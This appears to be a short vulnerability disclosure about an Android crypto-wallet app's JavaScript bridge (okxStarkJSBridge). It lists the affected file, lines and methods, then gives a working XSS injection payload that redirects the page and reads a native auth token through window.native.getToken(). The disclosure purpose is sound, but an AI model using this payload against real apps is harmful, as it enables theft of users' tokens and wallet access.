Vulnerability Details
Interface: okxStarkJSBridge (okxInternalJSBridge)
Vulnerable File: sources/p270o/cfy.java
Vulnerable Lines: 32, 60
Vulnerable Methods: requestAccounts, disconnect, connectWallets, signMessage
Vulnerable Pattern: UNQUOTED ID injection
XSS Payload
Payload: 1);setTimeout(()=>{window.location='https://www.okx.com'},500);setTimeout(()=>{alert(window.native.getToken())},1000);//
Explanation: Redirects to www.okx.com after 500ms, then executes alert(window.native.getToken()) after 1000ms